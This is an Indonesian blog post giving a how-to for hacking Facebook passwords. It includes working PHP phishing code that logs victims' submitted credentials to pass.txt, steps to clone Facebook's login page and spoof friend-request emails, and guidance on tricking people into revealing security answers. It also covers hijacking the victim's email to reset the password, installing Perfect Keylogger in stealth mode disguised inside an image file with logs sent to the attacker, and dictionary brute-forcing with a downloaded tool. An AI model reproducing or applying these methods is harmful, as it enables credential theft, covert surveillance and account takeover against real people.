Selasa

Cara – Cara Metode untuk Hack Facebook Password

klik:







----> Facebook phishing:

hacker facebook menggunakan teknik ini pada dasarnya meng-upload versi palsu dari facebook ke server dan korban mengirim username dan password ke situs tersebut. Setelah korban mencoba untuk log on, maka email username dan password tersimpan oleh mereka.
Begitu korban masukkan username dan password mereka akan membawa mereka ke :

 google.com /? email = ADA-EMAIL & pass = ADA-PASSWORD yang tersimpan seperti notepad yang tersimpan adalah alamat email dan password serta IP address dan waktu log in si korban..

Yang akan tersimpan adalah  semua penjelajahan korban di dunia maya. Jika korban memiliki akses ke komputer mereka Anda hanya dapat melihat itu dan memiliki username dan password. Ini adalah trik awesome dan jika korban memiliki akses ke komputer mereka. Dan anda bisa lihat videonya dibawah ini sebagai contoh kalau ada kekurangan pada tulisan saya nantinya...dahhhhhh capek ngetik nya oiiiiii......






1. buka http://www.facebook.com/login.php
lalu view source codenya dengan cara Ctrl+U dan copy serta paste ke notepad.
Cari "action=" (tanpa quote atau tanda petik) dan memulai mengeditnya dengan cara pada notepad pilih edit lalu cari find atau Ctrl+F.
pada action="https://www.facebook.com/login.php?login_attempt=1" ubahlah menjadi action="login.php"
simpan notepad ini menjadi facebook.htm.dan pada action="https://login.facebook.com/login.php" ubahlah  action menjadi ="login.php"
kemudian ubah juga methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :

Code: Select all
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

------->> Simpan sebagai login.php

3. Buka notepad lagi biarkan saja kosong, lalu simpan dengan nama pass.txt.
Upload 3 file tersebut "facebook.htm, login.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com, dan t35.com

4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.

5. gunakanlah ini untuk pengetahauan anda, dan bila untuk mempelajarinya buatlah akun fb anda yang baru untuk sebagai contoh mempraktekannya,, jangan pernah merugikan orang lain karna karma itu selalu ada broo.....
6.Ok selesai




----> Social engineering:

Ini metode yang mungkin sangat sulit untuk mendapatkan password korban, tapi mungkin Anda sudah tahu alamat email, hal yang harus dilakukan adalah mencoba untuk mencari tahu pertanyaan keamanannya. Anda dapat mengajukan pertanyaan secara halus kepada korban Anda untuk mencoba menentukan jawaban pertanyaan. Dan jika anda tidak mendapatkan pertanyaan keamanan kepada korban berarti anda belum beruntung dan silahkan ulangi kepada korban yang lainya.. atau mungkin korban telah tahu dan bisa juga memberikan jawaban yang salah agar anda berpikir untuk mencari jawabannya.. hehehehehehehehe    Carilah korban yang baru menggunakan facebook atau awam sekali dengan facebook. Setelah Anda memiliki jawaban atas pertanyaan keamanan Anda dapat me mulai mencoba untuk mendapatkan password dengan cara itu. Kalu jika tidak berhasil berarti anda yang tidak mengerti atau saya sendiri yang bodoh membuat tulisan ini... hi hi hi hi hi hi hi




----> Alamat email Primer hack :

Jika Anda tidak bisa juga hack  account facebook. Metode awesome jika Anda bisa melakukannya. Yang harus dilakukan adalah mendapatkan akses ke email korban. Kemudian Anda hanya pergi ke facebook dan masukkan sandi pada ‘lupa’  akan ke email facebook utama dan instruksi tentang bagaimana untuk mengatur ulang sandi.. Sekarang Anda akan memiliki akses penuh ke account.
Saya akan menguraikan metode ini di masa depan.
Setelah Anda memiliki alamat email facebook dan sandi Anda dapat dengan mudah masuk ke account seseorang.




----> Keylogging:

Merupakan teknik yang pada dasarnya Anda menginstal keylogger dikomputer mereka. Ini akan menyimpan semua aktivitas keyboard dan Anda dapat dengan mudah mengetahui username dan password korban.
Download Perfect Keylogger di blazingtools.com .Perfect keylogger bisa berjalan pada Windows 95, NT4, 98, Me, 2000, XP, Server 2003/2008, Vista. Serta internet Explorer 5.0 atau yang terbaru.
1. Jalankan file setupnya

2. Ketika dalam proses instalasi anda akan diminta memasukan nama panggilan untuk perfect keylogger, ini juga kelebihan perfect keylogger
3. Setelah itu anda diminta untuk menentukan keberadaan instalasi program perfect keylogger ini, apabila anda menaruh di tempat-tempat yang lebih dalam di folder WINDOWS maka ini juga dapat menghindari perfect keylogger ketahuan. Dan dalam bagian proses instalasi ini terdapat jenis instalasi perfect keylogger, apakah anda ingin menginstall secara regular atau stealth. Apabila anda menginstall Stealth maka yang akan di install hanya mesin programnya saja tanpa file Help dan Uninstaller.

4. Klik Continue Evaluation untuk melanjutkan, lalu akan terbuka programnya. Untuk melihat properti dan settingan dari keylogger.
5. Klik kanan logo tersebut dan akan muncul pop up menu dari perfect keylogger. Pilih menu Option untuk settingan keylogger-nya.

5. Pertama kita set terlebih dahulu Hotkeys untuk memanggil Perfect Keylogger, secara default kombinasi tombol Ctrl+Alt+L dipakai untuk memanggil Perfect Keylogger. Untuk lebih aman anda atur sendiri kombinsai tombol tersebut. Lalu setting Invisibility untuk mengatur hidden atau file tersembunyi dari keylogger.

6. Lalu lihat menu Logging, anda dapat setting apa saja yang anda ingin rekam dalam keylogger. supaya tidak ada orang lain yang dapat mengakses keylogger

7. Hasil logging dapat dilihat dengan akses pop up menu tadi dalam jendela Log Viewer.

8. Lalu di dalam menu Screenshots, anda dapat menset settingan Perfect Keylogger untuk merekam screenshot komputer korban. Disini dapat di setting waktu, kualitas gambar, ukuran gambar dan screenshots ketika adanya hentakan pada tombol mouse.

9. Di menu E-mail, anda dapat mengatur laporan log Perfect Keylogger untuk dikirimkan ke email anda. Disini anda dapat men-set waktu pengiriman, log apa saja yang akan dikirim, besar limit file dan lainnya.

10. Dalam tab Delivery diharuskan mengisi form yang disediakan sebagai syarat dalam pengiriman file ke email anda. Perfect Keylogger hanya bisa mengirim file ke email yang memiliki smtp dan fasilitas POP3 jadi hotmail dan yahoo tidak bisa digunakan. Untuk lebih mudahnya, sebaiknya gunakan email telkomnet atau plasa karena setting pop3 dan smtp untuk keduanya sangat mudah. Pada kotak isian smtp, isilah dengan “smtp.telkom.net” tanpa tanda kutip.

13. FTP akses pun perlu apabila port 80 ataupun 25 ditutup, supaya jaga-jaga file anda tidak terkirim. Di tab Delivery anda harus menset alamat FTP dan user password maupun direktori FTP tersebut.

14. Remote Installation. Menu ini adalah keunggulan lainnya dari Perfect Keylogger, karena Perfect Keylogger akan membentuk sebuah executable file yang digabungkan dengan file apapun. Jadi lebih mirip trojan yang dibungkus file gambar. Perlu diingatkan file remote executable yang telah terbentuk tadi terbentuk dengan settingan PerfectKeylogger anda pada awal tadi.

15. Ketika anda masuk ke menu anda diminta untuk memilih sebuah file untuk di kombinasikan dengan Perfect Keylogger remote exe.anda dapat men-set juga tanggal uninstalisasi apabila anda ingin menghilangkan keylogger tersebut di komputer korban pada waktu tertentu. Untuk kombinasi file lebih baik menggunakan gambar agar korban tidak curiga. Dan isikan juga lokasi folder instalasikeylogger di komputer korban nantinya.

16. File remote pun terbentuk. Silahkan tes remote file tadi. Pengetesan sebaiknya dilakuan pada Vmware ataupun Virtual PC agar anda tidak menjadi korban. Perlu diingatkan file remote executable yang telah terbentuk tadi terbentuk dengan settingan PerfectKeylogger anda pada awal tadi.

17. Perfect Keylogger tidak terdeteksi Remove program dan Window Task Manager. Ini berarti Perfect Keylogger benar-benar tidak terdeteksi.




----> Menggunakan FacebooZ

Hack facebook menggunakan FacebooZ adalah cara hack yang cukup rumit , cara hack facebook menggunakan FacebooZ , anda harus mempunyai program internet berupa software Java dari Sun Microsystem dan Framework minimal edisi 2.0 , bila di komputer anda tidak terpasang software ini , cobalah untuk melakukan cara hack facebook menggunakan FacebooZ ini di warnet , bila masih tidak ada fasilitas java dan Frameworknya , maka ikuti langkah langkah yang ada di bawah ini untuk cara hackfacebook menggunakan FacebooZ.


Untuk  Java :

1. Buka Alamat Web
http://jdl.sun.com/webapps/getjava/BrowserRedirect?locale=en&host=www.java.com:80

2. Download Penginstall Java Tersebut ke Komputer
Verifying Java Version
Congratulations!
You have the recommended Java installed (Version - Update --).
If you want to download Java for another computer or Operating System, see all Java downloads here.

To find out if Java is working on your system please visit:
Test your Java Virtual Machine (JVM)

3. Install Program Java tersebut di komputer anda.


Untuk FrameWork :

1. Buka Alamat Web http://www.microsoft.com/downloads/en/confirmation.aspx?familyId=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displayLang=en

2. Download FrameWork
3. Install program di komputer  anda

langkah langkahnya :

1. Download Facebook di
klik
href="http://www.ziddu.com/download/6202817/Groundfacebook.rar.html

klik
http://www.ziddu.com/download/6202880/Document1.pdf.html

2. Gunakan FacebooZ dan mengextract file zip nya.
3. Klik File yang bernama facebooZ.jar,
4.Akan tampil program FacebooZ , truz buka notepad , diisikan dengan kata kunci dari kamus indonesia-inggris dan data data si korban , misalkan di notepad diisikan tanggal lahir , alamat , hobi,makanan dan minuman kesukaan, nama pacar, dan lain lain yang sering digunakan oleh kebanyakan orang, seperti pertanyaan keamanan yang anda tahu sebelumnya
Lalu save dengan nama password.txt dan tunggu Hasilnya.




----> Menggunakan Social Attack :

Cara hack seperti ini yang paling sederhana dan mudah dilakukan semua orang , dengan bermodalkan keakraban, tetapi tidak semua orang ingin password nya diketahaui sama orang yang tidak dikenalnya,, sedangkan teman yang kita kenal belum tahu kita bisa mendapatkannya.. walaupun anda tahu password nya pasti tidak akan lama password nya akan diganti lagi,, teman pun berpikir mungkin nanti se2orang teman akan berniat tidak baik pada FB kita.. kata pepatah pun mengatakan Rambut bolelah sama hitam tetapi, Hati dan pemikiran se2orang tidak bisa ditebak,,setiap manusia mempunyai pemikiran yang berbeda tiap harinya walaupun kita telah mengenalnya lebih lama atau mengenal dan mengetahaui lebih dari luarnya yaitu dalamnya... dalam nya ada apa yawhhhh.....??? hehehehehehehehe
Untuk itu anda harus mempunyai status sosial yang agak tinggi supaya anda bisa mendapatkan password dengan social attack tersebut..









===== ....[SELESAI]....=====


Tidak ada komentar:

Posting Komentar